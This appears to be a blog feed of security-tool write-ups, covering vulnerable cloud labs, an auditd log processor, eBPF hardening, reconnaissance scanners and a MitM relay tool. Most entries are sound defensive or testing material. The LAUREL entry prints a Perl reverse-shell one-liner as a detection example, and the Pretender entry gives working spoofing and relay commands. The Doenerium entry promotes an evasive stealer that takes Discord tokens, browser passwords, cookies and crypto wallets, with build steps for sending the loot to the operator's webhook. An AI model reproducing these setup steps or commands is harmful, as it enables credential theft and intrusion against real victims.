docker pull registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_azure:0.0.4
docker run -itd --name terraformgoat_azure_0.0.4 registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_azure:0.0.4
docker exec -it terraformgoat_azure_0.0.4 /bin/bash


Demo

After entering the container, cd to the corresponding scenario directory and you can start deploying the scenario.

Here is a demonstration of the Alibaba Cloud Bucket Object Traversal scenario build.

docker pull registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_aliyun:0.0.4
docker run -itd --name terraformgoat_aliyun_0.0.4 registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_aliyun:0.0.4
docker exec -it terraformgoat_aliyun_0.0.4 /bin/bash



cd /TerraformGoat/aliyun/oss/bucket_object_traversal/
aliyun configure
terraform init
terraform apply



When the program prompts Enter a value:, type yes and press enter. Then use curl to access the bucket, and you can see the objects traversed.



To avoid continuing charges from the cloud service, remember to destroy the scenario promptly after using it.

terraform destroy

Uninstall

If you are in a container, first execute the exit command to exit the container, and then execute the following command under the host.

docker stop $(docker ps -a -q -f "name=terraformgoat*")
docker rm $(docker ps -a -q -f "name=terraformgoat*")
docker rmi $(docker images -a -q -f "reference=registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat*")

Notice

  1. The README of each vulnerable environment is meant to be executed within the TerraformGoat container environment, so the TerraformGoat container needs to be deployed first.
  2. Due to the risk of lateral movement on the cloud intranet in some scenarios, it is strongly recommended that users configure the scenarios with their own test accounts, avoid using the cloud account of the production environment, and install TerraformGoat using the Dockerfile to isolate the user's local cloud vendor token from the test account token.
  3. TerraformGoat is for educational purposes only; it may not be used for illegal or criminal purposes. Any consequences arising from TerraformGoat are the responsibility of the person using it, not the selefra organization.


Contributing

Contributions are welcomed and greatly appreciated. See CONTRIBUTING.md for details on the contribution workflow.

License

TerraformGoat is under the Apache 2.0 license. See the LICENSE file for details.



Pretender - Your MitM Sidekick For Relaying Attacks Featuring DHCPv6 DNS Takeover As Well As mDNS, LLMNR And NetBIOS-NS Spoofing

27 July 2022 at 12:30
By: Zion3R

Your MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover
as well as mDNS, LLMNR and NetBIOS-NS spoofing


pretender is a tool developed by RedTeam Pentesting to obtain machine-in-the-middle positions via spoofed local name resolution and DHCPv6 DNS takeover attacks. pretender primarily targets Windows hosts, as it is intended to be used for relaying attacks but can be deployed on Linux, Windows and all other platforms Go supports. Name resolution queries can be answered with arbitrary IPs for situations where the relaying tool runs on a different host than pretender. It is designed to work with tools such as Impacket's ntlmrelayx.py and krbrelayx that handle the incoming connections for relaying attacks or hash dumping.

Read our blog post for more information about DHCPv6 DNS takeover, local name resolution spoofing and relay attacks.


Usage

To get a feel for the situation in the local network, pretender can be started in --dry mode where it only logs incoming queries and does not answer any of them:

pretender -i eth0 --dry
pretender -i eth0 --dry --no-ra # without router advertisements

To perform local name resolution spoofing via mDNS, LLMNR and NetBIOS-NS as well as a DHCPv6 DNS takeover with router advertisements, simply run pretender like this:

pretender -i eth0

You can disable certain attacks with --no-dhcp-dns (disables DHCPv6, DNS and router advertisements), --no-lnr (disables mDNS, LLMNR and NetBIOS-NS), --no-mdns, --no-llmnr, --no-netbios and --no-ra.

If ntlmrelayx.py runs on a different host (say 10.0.0.10/fe80::5), run pretender like this:

pretender -i eth0 -4 10.0.0.10 -6 fe80::5

Pretender can be set up to only respond to queries for certain domains (or all but certain domains), and it can perform the spoofing attacks only for certain hosts (or all but certain hosts). Referencing hosts by hostname relies on the name resolution of the host that runs pretender. See the following example:

pretender -i eth0 --spoof example.com --dont-spoof-for 10.0.0.3,host1.corp,fe80::f --ignore-nofqdn

For more information, run pretender --help.


Tips

  • Make sure to enable IPv6 support in ntlmrelayx.py with the -6 flag
  • Pretender can be configured to stop after a certain time period for situations where it cannot be aborted manually (--stop-after and main.vendorStopAfter)
  • Host info lookup (which relies on the ARP table, IP neighbours and reverse lookups) can be disabled with --no-host-info or main.vendorNoHostInfo
  • If you are not sure which interface to choose (especially on Windows), list all interfaces with names and addresses using --interfaces
  • If you want to exclude hosts from local name resolution spoofing, make sure to also exclude their IPv6 addresses or use --no-ipv6-lnr/main.vendorNoIPv6LNR
  • DHCPv6 messages usually contain a FQDN option (which can also sometimes contain a hostname which is not a FQDN). This option is used to filter out messages by hostname (--spoof-for/--dont-spoof-for). You can decide what to do with DHCPv6 messages without FQDN option by setting or omitting --ignore-nofqdn
  • Depending on the build configuration, either the operating system resolver (CGO_ENABLED=1) or a Go implementation (CGO_ENABLED=0) is used. This can be important for host info collection because the OS resolver may support local name resolution and the Go implementation does not, unless a stub resolver is used.
  • The host info functionality is currently only available for Windows and Linux.
  • A custom MAC address vendor list can be compiled into the binary by replacing the default list hostinfo/mac-vendors.txt. Only lines with MAC prefixes in the following format are recognized: FF:FF:FF<tab>VendorID<tab>Vendor (the MAC prefix length can be arbitrary).
  • If you only want to perform Kerberos relaying you can specify --no-lnr and --spoof-types SOA to ignore any queries that are unrelated to the attack (see the example after this list).
  • When conducting a Kerberos relay attack where krbrelayx.py runs on a different host than pretender (relay IPv4 address points to different host that runs krbrelayx.py), the host running krbrelayx.py will also need to run pretender in order to receive and deny the Dynamic Update query sent to the relay IPv4 address.
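
A minimal sketch of such a Kerberos-relay-only invocation, combining the flags mentioned in the tips above:

pretender -i eth0 --no-lnr --spoof-types SOA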

Building and Vendoring

Pretender can be built as follows:

go build

Pretender can also be compiled with pre-configured settings. For this, the ldflags have to be modified like this:

-ldflags '-X main.vendorInterface=eth1'

For example, Pretender can be built for Windows with a specific default interface, without colored output and with a relay IPv4 address configured:

GOOS=windows go build -trimpath -ldflags '-X "main.vendorInterface=Ethernet 2" -X main.vendorNoColor=true -X main.vendorRelayIPv4=10.0.0.10'

Full list of vendoring options (see defaults.go or pretender --help for detailed information):

vendorInterface
vendorRelayIPv4
vendorRelayIPv6
vendorSOAHostname
vendorNoDHCPv6DNSTakeover
vendorNoDHCPv6
vendorNoDNS
vendorNoMDNS
vendorNoNetBIOS
vendorNoLLMNR
vendorNoLocalNameResolution
vendorNoRA
vendorNoIPv6LNR
vendorSpoof
vendorDontSpoof
vendorSpoofFor
vendorDontSpoofFor
vendorSpoofTypes
vendorIgnoreDHCPv6NoFQDN
vendorDryMode
vendorTTL
vendorLeaseLifetime
vendorRARouterLifetime
vendorRAPeriod
vendorStopAfter
vendorVerbose
vendorNoColor
vendorNoTimestamps
vendorLogFileName
vendorNoHostInfo
vendorHideIgnored
vendorRedirectStderr
vendorListInterfaces


Laurel - Transform Linux Audit Logs For SIEM Usage

26 July 2022 at 12:30
By: Zion3R


LAUREL is an event post-processing plugin for auditd(8) to improve its usability in modern security monitoring setups.


Why?

TLDR: Instead of audit events that look like this…

type=EXECVE msg=audit(1626611363.720:348501): argc=3 a0="perl" a1="-e" a2=75736520536F636B65743B24693D2231302E302E302E31223B24703D313233343B736F636B65742…

…turn them into JSON logs where the mess that your pen testers/red teamers/attackers are trying to make becomes apparent at first glance:

{ … "EXECVE":{ "argc": 3,"ARGV": ["perl", "-e", "use Socket;$i=\"10.0.0.1\";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};"]}, …}

This happens at the source. The generated event even contains useful information about the spawning process:

"PARENT_INFO":{"ID":"1643635026.276:327308","comm":"sh","exe":"/usr/bin/dash","ppid":3190631}

Description

Logs produced by the Linux Audit subsystem and auditd(8) contain information that can be very useful in a SIEM context (if a useful rule set has been configured). However, the format is not well-suited for at-scale analysis: Events are usually split across different lines that have to be merged using a message identifier. Files and program executions are logged via PATH and EXECVE elements, but a limited character set for strings causes many of those entries to be hex-encoded. For a more detailed discussion, see Practical auditd(8) problems.

LAUREL solves these problems by consuming audit events, parsing and transforming them into more data and writing them out as a JSON-based log format, while keeping all information intact that was part of the original audit log. It does not replace auditd(8) as the consumer of audit messages from the kernel. Instead, it uses the audisp ("audit dispatch") interface to receive messages via auditd(8). Therefore, it can peacefully coexist with other consumers of audit events (e.g. some EDR products).

Refer to JSON-based log format for a description of the log format.

We developed this tool because we were not content with feature sets and performance characteristics of existing projects and products. Please refer to Performance for details.

A word about audit rules

A good starting point for an audit ruleset is https://github.com/Neo23x0/auditd, but generally speaking, any ruleset will do. LAUREL will currently only work as designed if End Of Event records are not suppressed, so rules like

-a always,exclude -F msgtype=EOE

should be removed.

Events with context

Every event that is caused by a syscall or filesystem rule is annotated with information about the parent of the process that caused the event. If available, ID points to the message corresponding to the last execve syscall for this process:

"PARENT_INFO": {
"ID": "1643635026.276:327308",
"comm": "sh",
"exe": "/usr/bin/dash",
"ppid": 1532
}

Adding more context: Keys and process labels

Audit events can contain a key, a short string that can be used to filter events. LAUREL can be configured to recognize such keys and add them as labels to the process that caused the event. These labels can also be propagated to child processes. This is useful to avoid expensive JOIN-like operations in log analysis to filter out harmless events.

Consider the following rule that sets a key for apt and dpkg invocations:

-w /usr/bin/apt-get -p x -k software_mgmt

Let's configure LAUREL to turn the software_mgmt key into a process label that is propagated to child processes:
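
The corresponding snippet in LAUREL's configuration should look roughly like this (a sketch from memory of the project's documentation; verify the section and key names against the configuration file shipped with your LAUREL version):

[label-process]
label-keys = [ "software_mgmt" ]
propagate-labels = [ "software_mgmt" ]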

Together with a ruleset that logs execve(2) and variants, this will cause every event directly caused by apt-get and its subprocesses to be labelled software_mgmt.

For example, running sudo apt-get update on a Debian/bullseye system with a few sources configured, the following subprocesses labelled software_mgmt can be observed in LAUREL's audit log:

  • apt-get update
  • /usr/bin/dpkg --print-foreign-architectures
  • /usr/lib/apt/methods/http
  • /usr/lib/apt/methods/https
  • /usr/lib/apt/methods/https
  • /usr/lib/apt/methods/http
  • /usr/lib/apt/methods/gpgv
  • /usr/lib/apt/methods/gpgv
  • /usr/bin/dpkg --print-foreign-architectures
  • /usr/bin/dpkg --print-foreign-architectures

This sort of tracking also works for package installation or removal. If some package's post-installation script is behaving suspiciously, a SIEM analyst will be able to make the connection to the software installation process by inspecting the single event.

Installation

See INSTALL.md.

License

GNU General Public License, version 3

Authors

The logo was created by Birgit Meyer <[email protected]>.



Bpflock - eBPF Driven Security For Locking And Auditing Linux Machines

25 July 2022 at 12:30
By: Zion3R


bpflock - eBPF driven security for locking and auditing Linux machines.

Note: bpflock is currently in an experimental stage; it may break, options and security semantics may change, and some BPF programs will be updated to use the Cilium ebpf library.


1. Introduction

bpflock uses eBPF to strengthen Linux security. By restricting access to a wide range of Linux features, bpflock is able to reduce the attack surface and block some well-known attack techniques.

Only programs like container managers, systemd, and other containers/programs that run in the host pid and network namespaces are allowed access to full Linux features; containers and applications that run in their own namespaces will be restricted. If bpflock's bpf programs run under the restricted profile, then all programs/containers, including privileged ones, will have their access denied.

bpflock protects Linux machines by taking advantage of multiple security features including Linux Security Modules + BPF.

Architecture and Security design notes:

  • bpflock is not a mandatory access control labeling solution, and it does not intend to replace AppArmor, SELinux, and other MAC solutions. bpflock uses a simple declarative security profile.
  • bpflock offers multiple small bpf programs that can be reused in multiple contexts from Cloud Native deployments to Linux IoT devices.
  • bpflock is able to restrict root from accessing certain Linux features, however it does not protect against evil root.

2. Functionality Overview

2.1 Security features

bpflock offers multiple security protections that can be classified into several categories.

2.2 Semantics

bpflock keeps the security semantics simple. It supports three global profiles to broadly cover the security spectrum, and restricts access to specific Linux features.

  • profile: this is the global profile that can be applied per bpf program; it takes one of the following:

    • allow|none|privileged : they are the same, they define the least secure profile. In this profile access is logged and allowed for all processes. Useful to log security events.
    • baseline : restrictive profile where access is denied for all processes, except privileged applications and containers that run in the host namespaces, or per cgroup allowed profiles in the bpflock_cgroupmap bpf map.
    • restricted : heavily restricted profile where access is denied for all processes.
  • Allowed or blocked operations/commands:

    Under the allow|privileged or baseline profiles, a list of allowed or blocked commands can be specified and will be applied.

    • --protection-allow : comma-separated list of allowed operations. Valid under baseline profile, this is useful for applications that are too specific and perform privileged operations. It will reduce the use of the allow | privileged profile, so instead of using the privileged profile, we can specify the baseline one and add a set of allowed commands to offer a case-by-case definition for such applications.
    • --protection-block : comma-separated list of blocked operations. Valid under allow|privileged and baseline profiles, it allows to restrict access to some features without using the full restricted profile that might break some specific applications. Using baseline or privileged profiles opens the gate to access most Linux features, but with the --protection-block option some of this access can be blocked.

For bpf security examples check bpflock configuration examples

3. Deployment

3.1 Prerequisites

bpflock needs the following:

  • Linux kernel version >= 5.13 with the following configuration:

    Obviously a BTF enabled kernel.

    Enable BPF LSM support

    If your kernel was compiled with CONFIG_BPF_LSM=y (check /boot/config-* to confirm) but running bpflock fails with:

    must have a kernel with 'CONFIG_BPF_LSM=y' 'CONFIG_LSM=\"...,bpf\"'"

    Then to enable BPF LSM as an example on Ubuntu:

    1. Open the /etc/default/grub file as privileged of course.
    2. Append the following to the GRUB_CMDLINE_LINUX variable and save.
      "lsm=lockdown,capability,yama,apparmor,bpf"
      or
      GRUB_CMDLINE_LINUX="lsm=lockdown,capability,yama,apparmor,bpf"
    3. Update grub config with:
      sudo update-grub2
    4. Reboot into your kernel.

    3.2 Docker deployment

    To run using the default allow or privileged profile (the least secure profile):

    docker run --name bpflock -it --rm --cgroupns=host \
    --pid=host --privileged \
    -v /sys/kernel/:/sys/kernel/ \
    -v /sys/fs/bpf:/sys/fs/bpf linuxlock/bpflock

    Fileless Binary Execution

    To log and restict fileless binary execution run with:

    docker run --name bpflock -it --rm --cgroupns=host --pid=host --privileged \
    -e "BPFLOCK_FILELESSLOCK_PROFILE=restricted" \
    -v /sys/kernel/:/sys/kernel/ \
    -v /sys/fs/bpf:/sys/fs/bpf linuxlock/bpflock

    When running under restricted profile, the container logs will display:

    Running under the restricted profile may break things, this is why the default profile is allow.

    Kernel Modules Protection

    To apply Kernel Modules Protection run with environment variable BPFLOCK_KMODLOCK_PROFILE=baseline or BPFLOCK_KMODLOCK_PROFILE=restricted:

    docker run --name bpflock -it --rm --cgroupns=host --pid=host --privileged \
    -e "BPFLOCK_KMODLOCK_PROFILE=restricted" \
    -v /sys/kernel/:/sys/kernel/ \
    -v /sys/fs/bpf:/sys/fs/bpf linuxlock/bpflock

    Example:

    $ sudo unshare -p -n -f
    # modprobe xfs
    modprobe: ERROR: could not insert 'xfs': Operation not permitted
    Kernel Image Lock-down

    To apply Kernel Image Lock-down run with environment variable BPFLOCK_KIMGLOCK_PROFILE=baseline:

    docker run --name bpflock -it --rm --cgroupns=host --pid=host --privileged \
    -e "BPFLOCK_KIMGLOCK_PROFILE=baseline" \
    -v /sys/kernel/:/sys/kernel/ \
    -v /sys/fs/bpf:/sys/fs/bpf linuxlock/bpflock
    $ sudo unshare -f -p -n bash
    # head -c 1 /dev/mem
    head: cannot open '/dev/mem' for reading: Operation not permitted
    BPF Protection

    To apply bpf restriction run with environment variable BPFLOCK_BPFRESTRICT_PROFILE=baseline or BPFLOCK_BPFRESTRICT_PROFILE=restricted:

    docker run --name bpflock -it --rm --cgroupns=host --pid=host --privileged \
    -e "BPFLOCK_BPFRESTRICT_PROFILE=baseline" \
    -v /sys/kernel/:/sys/kernel/ \
    -v /sys/fs/bpf:/sys/fs/bpf linuxlock/bpflock

    Example running in a different pid and network namespaces and using bpftool:

    $ sudo unshare -f -p -n bash
    # bpftool prog
    Error: can't get next program: Operation not permitted
    Running with the -e "BPFLOCK_BPFRESTRICT_PROFILE=restricted" profile will deny bpf for all:
    3.3 Configuration and Environment file

    Passing configuration as bind mounts can be achieved using the following command.

    Assuming bpflock.yaml and bpf.d profiles configs are in current directory inside bpflock directory, then we can just use:

    ls bpflock/
    bpf.d bpflock.d bpflock.yaml
    docker run --name bpflock -it --rm --cgroupns=host --pid=host --privileged \
    -v $(pwd)/bpflock/:/etc/bpflock \
    -v /sys/kernel/:/sys/kernel/ \
    -v /sys/fs/bpf:/sys/fs/bpf linuxlock/bpflock

    Passing environment variables can also be done with files using --env-file. All parameters can be passed as environment variables using the BPFLOCK_$VARIABLE_NAME=VALUE format.

    Example run with environment variables in a file:

    docker run --name bpflock -it --rm --cgroupns=host --pid=host --privileged \
    --env-file bpflock.env.list \
    -v /sys/kernel/:/sys/kernel/ \
    -v /sys/fs/bpf:/sys/fs/bpf linuxlock/bpflock

    4. Documentation

    Documentation files can be found here.

    5. Build

    bpflock uses docker BuildKit to build and Golang to make some checks and run tests. bpflock is built inside Ubuntu container that downloads the standard golang package.

    Run the following to build the bpflock docker container:

    git submodule update --init --recursive
    make

    BPF programs are built using libbpf. The Docker image used is Ubuntu.

    If you want to only build the bpf programs directly without using docker, then on Ubuntu:

    sudo apt install -y pkg-config bison binutils-dev build-essential \
    flex libc6-dev clang-12 libllvm12 llvm-12-dev libclang-12-dev \
    zlib1g-dev libelf-dev libfl-dev gcc-multilib \
    libcap-dev libiberty-dev libbfd-dev

    Then run:

    make bpf-programs

    In this case the generated programs will be inside the ./bpf/build/... directory.

    Credits

    bpflock uses a lot of resources, including source code from the Cilium and bcc projects.

    License

    The bpflock user space components are licensed under the Apache License, Version 2.0. The BPF code, where noted, is licensed under the GNU General Public License, Version 2.0.



Doenerium - Fully Undetected Grabber (Grabs Wallets, Passwords, Cookies, Modifies Discord Client Etc.)

24 July 2022 at 12:30
By: Zion3R

Fully Undetected Grabber (Grabs Wallets, Passwords, Cookies, Modifies Discord Client Etc.)

Features

Stealer

  • Discord Token
  • Discord Info - Username, Phone number, Email, Billing, Nitro Status & Backup Codes
  • Discord Friends with rare badges
  • Grabs crypto wallets
    • Zcash
    • Armory
    • Bytecoin
    • Jaxx
    • Exodus
    • Ethereum
    • Electrum
    • AtomicWallet
    • Guarda
    • Coinomi
  • Browser (Chrome, Opera, Firefox, OperaGX, Edge, Brave, Yandex) - Passwords, Cookies, Autofill & History (Searches for specific keywords such as PayPal, Coinbase etc. in them)
  • Screenshot(s)
  • Injects itself to discord to grab token when changed


Additional

  • Crypto Clipper - BTC, LTC, XMR, ETH, XRP, NEO, BCH, DOGE, DASH, XLM
  • Ultra Obfuscation (use https://obfuscator.io)
  • Anti-Debug
  • Anti-VM
  • Validates a found discord token and then sends it to your discord webhook
  • Sends all files to your discord webhook in beautiful embeds and a structured zip file


Screenshots









Setting Up

Install Node.js

Install Visual Studio with the C++ compilers and all related components enabled (it is a few gigabytes, but you won't run into build errors)

Run install.bat file to install all necessary files

Replace WEBHOOK with your webhook in config.js

Run build.bat and wait for doenerium-win.exe to be built.

Todo

  • Exodus wallet injection (get the password whenever the user logs in the wallet)
  • More grabbers (VPNs, gaming, messengers)
  • Keylogger
  • Growtopia stealer
  • Discord bot to build within discord ($build <webhook_url>)
  • Dynamic encryption

License

By downloading this, you agree to the Commons Clause license and that you're not allowed to sell this repository or any code from this repository. For more info see commonsclause

Note

There is no official Telegram server for this project. I don't own t.me/doenerium

I am not responsible for any damages this software may cause. This was made for personal education.

Credits

Credits to Pandoric / PandoricGalaxy for creating this beautiful README file



modDetective - Tool That Chronologizes Files Based On Modification Time In Order To Investigate Recent System Activity

23 July 2022 at 12:30
By: Zion3R


modDetective is a small Python tool that chronologizes files based on modification time in order to investigate recent system activity. This can be used in CTF's in order to pinpoint where escalation and attack vectors may exist.



To see the tool in its most useful form, try running the command as follows: python3 modDetective.py -i /usr/share,/usr/lib,/lib. This will ignore the /usr/lib, /usr/share, and /lib directories, which tend not to have anything of interest. Also note that by default the "dynamic" directories are ignored (/proc, /sys, /run, /snap, /dev).

What is modDetective Doing?

modDetective is very elementary in how it operates. It simply walks the filesystem, with bounds determined by user-specified options (-i is for ignore, meaning the tool will walk every directory EXCEPT for the ones specified in the -i option, and -e is for exclusive, meaning the tool will ONLY walk the directories specified). While walking, it picks up the modification times of each file, then orders these modification times in order to output them chronologically.

Additionally, in the output you will potentially see some files highlighted red. These files are denoted as "Indicators of User Activity," since recent modifications to these files indicate that a user is currently active. As of now, these files include .swp files, .bash_history, .python_history and .viminfo. This list will be extended as I brainstorm more files that indicate present user activity.
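
For illustration, the walk-and-sort idea plus the indicator highlighting can be sketched in a few lines of Python (a simplified illustration, not modDetective's actual source):

import os
import time

# Files whose recent modification suggests a user is currently active
INDICATORS = {".bash_history", ".python_history", ".viminfo"}
# The "dynamic" directories ignored by default
IGNORED = ("/proc", "/sys", "/run", "/snap", "/dev")

entries = []
for dirpath, dirnames, filenames in os.walk("/"):
    if dirpath.startswith(IGNORED):
        dirnames[:] = []  # prune: do not descend into ignored trees
        continue
    for name in filenames:
        path = os.path.join(dirpath, name)
        try:
            entries.append((os.lstat(path).st_mtime, path))
        except OSError:
            pass  # unreadable entry; skip it

for mtime, path in sorted(entries):  # chronological output
    base = os.path.basename(path)
    marker = " [user activity]" if base in INDICATORS or base.endswith(".swp") else ""
    print(time.ctime(mtime), path + marker)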

Requirements

modDetective currently works only with python3; python2 compatibility will be completed shortly (hence the lack of f-strings). Standard libraries should be fine.



LiveTargetsFinder - Generates Lists Of Live Hosts And URLs For Targeting, Automating The Usage Of MassDNS, Masscan And Nmap To Filter Out Unreachable Hosts And Gather Service Information

22 July 2022 at 12:30
By: Zion3R


Generates lists of live hosts and URLs for targeting, automating the usage of Massdns, Masscan and nmap to filter out unreachable hosts

Given an input file of domain names, this script will automate the usage of MassDNS to filter out unresolvable hosts, and then pass the results on to Masscan to confirm that the hosts are reachable and on which ports. The script will then generate a list of full URLs to be used for further targeting (passing into tools like gobuster or dirsearch, or making HTTP requests), a list of reachable domain names, and a list of reachable IP addresses. As an optional last step, you can run an nmap version scan on this reduced host list, verifying that the earlier reachable hosts are up, and gathering service information from their open ports.


Overview

This script is especially useful for large domain sets, such as subdomain enumerations gathered from an apex domain with thousands of subdomains. With these large lists, an nmap scan would simply take too long. The goal here is to first use the less accurate, but much faster, MassDNS to quickly reduce the size of your input list by removing unresolvable domains. Then, Masscan will be able to take the output from MassDNS, and further confirm that the hosts are reachable, and on which ports. The script will then parse these results and generate lists of the live hosts discovered.

Now, the list of hosts should be reduced enough to be suitable for further scanning/testing. If you want to go a step further, you can tell the script to run an nmap scan on the list of reachable hosts, which should take a more reasonable amount of time with the shorter list of hosts. After running nmap, any false positives given by Masscan will be filtered out. Raw nmap output will be stored in the regular nmap XML format, and additional information from the version detection will be added to a SQLite database.

Installation

If using the nmap scan option, this tool assumes that you already have nmap installed

Note: Running the install script is only needed if you do not already have MassDNS and Masscan installed, or if you would like to reinstall them inside this repo. If you do not run the script, you can provide the paths to the respective executables as arguments. The script additionally expects that the resolvers list included with MassDNS be located at {massDNS_directory}/lists/resolvers.txt.

git clone https://github.com/allyomalley/LiveTargetsFinder.git
cd LiveTargetsFinder
sudo pip3 install -r requirements.txt

(OPTIONAL)

chmod +x install_deps.sh
./install_deps.sh

If you do not already have MassDNS and Masscan installed, and would prefer to install them yourself, see the documentation for instructions:

MassDNS

Masscan

I have only tested this script on macOS and Linux - the python script itself should work on a Windows machine, though I believe the installation for MassDNS and Masscan will differ.

Usage

python3 liveTargetsFinder.py [domainList] [options]
Flag | Description | Default | Required
--target-list | Input file containing a list of domains, e.g. google.com | (none) | Yes
--massdns-path | Path to the MassDNS executable, if non-default | ./massdns/bin/massdns | No
--masscan-path | Path to the Masscan executable, if non-default | ./masscan/bin/masscan | No
--nmap | Run an nmap version detection scan on the gathered live hosts | Disabled | No
--db-path | If using the --nmap option, the path to the database to append to (created if it does not exist) | output/liveTargetsFinder.sqlite3 | No
  • Note that the Masscan and MassDNS settings are hardcoded inside liveTargetsFinder.py. Feel free to edit them (lines 87 + 97).
  • Since this tool was designed with very large lists in mind, I tweaked many of the settings to try to balance speed, accuracy, and network constraints - these can all be adjusted to suit your needs and bandwidth.
  • The default settings for Masscan only scan ports 80 and 443.
    • -s, (--hashmap-size) in particular was chosen for performance reasons - you will likely be able to increase this.
    • Full MassDNS arguments:
      • -c 25 -o J -r ./massdns/lists/resolvers.txt -s 100 -w massdnsOutput -t A targetHosts
      • Documentation
  • Another setting of note is the --max-rate argument for Masscan - you will likely want to adjust this.
    • Full Masscan arguments:
      • -iL ipFile -oD masscanOutput --open-only --max-rate 5000 -p80,443 --max-retries 10
      • Documentation
  • The default nmap settings only scan ports 80 and 443, with -T4 timing and a few NSE scripts.
    • Full nmap arguments:
      • --script http-server-header.nse,http-devframework.nse,http-headers -sV -T4 -p80,443 -oX {output.xml}

Example

Did run install script:

python3 liveTargetsFinder.py --target-list victim_domains.txt

Did NOT run the install script:

python3 liveTargetsFinder.py --target-list victim_domains.txt --massdns-path ../massdns/bin/massdns --masscan-path ../masscan/bin/masscan 

Perform an nmap scan and write to/append to the default DB path (liveTargetsFinder.sqlite3)

python3 liveTargetsFinder.py --target-list victim_domains.txt --nmap

Perform an nmap scan and write to/append to the specified database

python3 liveTargetsFinder.py --target-list victim_domains.txt --nmap --db-path serviceinfo_victim.sqlite3

Output

Input: victimDomains.txt

File | Description | Examples
output/victimDomains_targetUrls.txt | List of reachable, live URLs | https://github.com, http://github.com
output/victimDomains_domains_alive.txt | List of live domain names | github.com, google.com
output/victimDomains_ips_alive.txt | List of live IP addresses | 10.1.0.200, 52.3.1.166
Supplied or default DB path | SQLite database storing live hosts and information about their running services |
output/victimDomains_massdns.txt | The raw output from MassDNS, in ndjson format |
output/victimDomains_masscan.txt | The raw output from Masscan, in ndjson format |
output/victimDomains_nmap.txt | The raw output from nmap, in XML format |
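
Since the README does not document the SQLite schema, a reasonable first step is to dump it before querying; a short Python sketch (the commented-out query uses purely hypothetical table/column names):

import sqlite3

con = sqlite3.connect("output/liveTargetsFinder.sqlite3")

# Print the real schema first; the table/column names below are assumptions
for (ddl,) in con.execute("SELECT sql FROM sqlite_master WHERE type='table'"):
    print(ddl)

# Hypothetical example query once you know the actual schema:
# for host, port, service in con.execute("SELECT host, port, service FROM hosts"):
#     print(host, port, service)

con.close()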


RESim - Reverse Engineering Software Using A Full System Simulator

21 July 2022 at 12:30
By: Zion3R


Reverse engineering using a full system simulator.

  • Dynamic analysis by instrumenting simulated hardware using Simics
  • Trace process trees, system calls and individual programs
  • Reverse execution to selected breakpoints and events
  • Integrated with IDA Pro(tm) debugging client
  • Fuzz with a customized AFL, injecting directly into simulated memory

RESim is a dynamic system analysis tool that provides detailed insight into processes, programs and data flow within networked computers. RESim simulates networks of computers through use of the Simics[1] platform's high fidelity models of processors, peripheral devices (e.g., network interface cards), and disks. The networked simulated computers load and run targeted software copied from images extracted from the physical systems being modeled.

Broadly, RESim aids reverse engineering and vulnerability analysis of networks of Linux-based systems by inventorying processes in terms of the programs they execute and the data they consume. Data sources include files, device interfaces and inter-process communication mechanisms. Process execution and data consumption is documented through dynamic analysis of a running simulated system without installation or injection of software into the simulated system, and without detailed knowledge of the kernel hosting the processes.

RESim also provides interactive visibility into individual executing programs through use of a custom plug-in to the IDA Pro disassembler/debugger. The disassembler/debugger allows setting breakpoints to pause the simulation at selected events in either future time, or past time. For example, RESim can direct the simulation state to reverse until the most recent modification of a selected memory address.
Reloadable checkpoints may be generated at any point during system execution.
A RESim simulation can be paused for inspection, e.g., when a specified process is scheduled for execution, and subsequently continued, potentially with altered memory or register state. The analyst can explicitly modify memory or register content, and can also dynamically augment memory based on system events, e.g., change a password file entry when read by the su program.

Analysis is performed entirely through observation of the simulated target system’s memory and processor state, without need for shells, software injection, or kernel symbol tables. The analysis is said to be external because the analysis observation functions have no effect on the state of the simulated system.

RESim has been integrated with the American Fuzzy Lop (AFL) fuzzer. This fuzzing system injects fuzzed data directly into the application read buffer, simplifying the fuzzing setup and workflow. RESim automatically replays and analyzes any detected crashes, identifying the causes of crashes, e.g., corruption of execution control.

Please refer to the RESim User's Guide for additional information. A brief demonstration of RESim can be seen here: (https://nps.box.com/s/rf3n104ualg38pon6b7fm6m6wqk9zz50)

RESim is based on a software vetting and forensic analysis platform created for the DARPA Cyber Grand Challenge. That repo is here: https://github.com/mfthomps/cgc-monitor. A paper describing that work is at https://www.sciencedirect.com/science/article/pii/S1742287618301920, and a fine summary of the use of Simics in the CGC Monitor is at https://software.intel.com/content/www/us/en/develop/blogs/simics-software-automates-cyber-grand-challenge-validation.html

[1]Simics is a full system simulator sold by Wind River, which holds all relevant trademarks.



Cdb - Automate Common Chrome Debug Protocol Tasks To Help Debug Web Applications From The Command-Line And Actively Monitor And Intercept HTTP Requests And Responses

20 July 2022 at 12:30
By: Zion3R


Pown CDB is a Chrome Debug Protocol utility. The main goal of the tool is to automate common tasks to help debug web applications from the command-line and actively monitor and intercept HTTP requests and responses. This is particularly useful during penetration tests and other types of security assessments and investigations.


Credits

This tool is part of the secapps.com open-source initiative.

  ___ ___ ___   _   ___ ___  ___
/ __| __/ __| /_\ | _ \ _ \/ __|
\__ \ _| (__ / _ \| _/ _/\__ \
|___/___\___/_/ \_\_| |_| |___/
https://secapps.com


Quickstart

This tool is meant to be used as part of Pown.js but it can be invoked separately as an independent tool.

Install Pown first as usual:

$ npm install -g [email protected]

Invoke directly from Pown:

$ pown cdb

Library Use

Install this module locally from the root of your project:

$ npm install @pown/cdb --save

Once done, invoke pown cli:

$ POWN_ROOT=. ./node_modules/.bin/pown-cli cdb

You can also use the global pown to invoke the tool locally:

$ POWN_ROOT=. pown cdb

Usage

WARNING: This pown command is currently under development and as a result will be subject to breaking changes.

pown cdb <command>

Chrome Debug Protocol Tool

Commands:
pown cdb launch Launch server application such as chrome, firefox, opera and edge [aliases: start]
pown cdb navigate <url> Go to the specified url [aliases: goto, go]
pown cdb network Chrome Debug Protocol Network Monitor [aliases: net, sniff, proxy, mon, monitor]
pown cdb cookies Dump current page cookies [aliases: cookie]
pown cdb screenshot <file> Screenshot the current page [aliases: capture, shoot, shot]

Options:
--version Show version number [boolean]
--help Show help [boolean]

pown cdb launch
